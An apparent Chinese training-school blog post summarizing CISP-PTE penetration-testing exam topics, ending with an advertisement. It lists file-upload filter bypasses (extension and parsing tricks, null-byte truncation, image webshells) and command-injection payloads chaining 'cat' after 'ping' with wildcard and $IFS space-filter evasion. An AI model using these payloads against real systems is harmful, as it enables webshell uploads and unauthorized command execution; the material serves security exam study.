新的一年开始了,因为有免面试的优势,考CISP-PTE渗透测试的越来越多了,好多人也买了资料来看,CISP-PTE整体上讲还是比较容易考的,现在给大家介绍部分的的知识点。2022年CISP-PTE考证相关知识点详解。
4.2 文件上传
• 解法:
• 1.php[空格] -> 1.php windows特性
• 1.php……(4000+)…. -> 1.php windows/linux
• 1.php.xxx -> 1.php apache解析
• 1.jpg/.php -> 1.php nginx解析(上传之后解析)
• 1.pphphp -> 1.php 单次消除
• Path=../upload/1.php%00 post:name=1.jpg -> ../upload/1.php%00/1.jpg -> ../upload/1.php
• 特殊后缀名:.phtml/.php4/.php5
• 优先使用图片马
4.3 命令执行
• 多数情况都是docker模拟的linux环境,但很可能存在waf
• 基本都是给你一个框,里面有个ping或者其他小小的命令
• 管道符了解一下 -> |
• ping 127.0.0.1 | cat ../1.txt
• ?了解一下
• Ping 127.0.0.1 | cat ../1.?xt
• 不允许有空格,$IFS$9了解一下
• ping 127.0.0.1|$IFS$9cat$IFS$9../1.?xt
• $IFS绕空格 后面跟的是数字字母时需要加$9
赛虎学院作为CISP-PTE培训机构,通过率常年保持在99 %以上,各地的学员皆可报名,每个月都能安排培训,就近选择培训地点。
扫码领取资料:
- 还没有人评论,欢迎说说您的想法!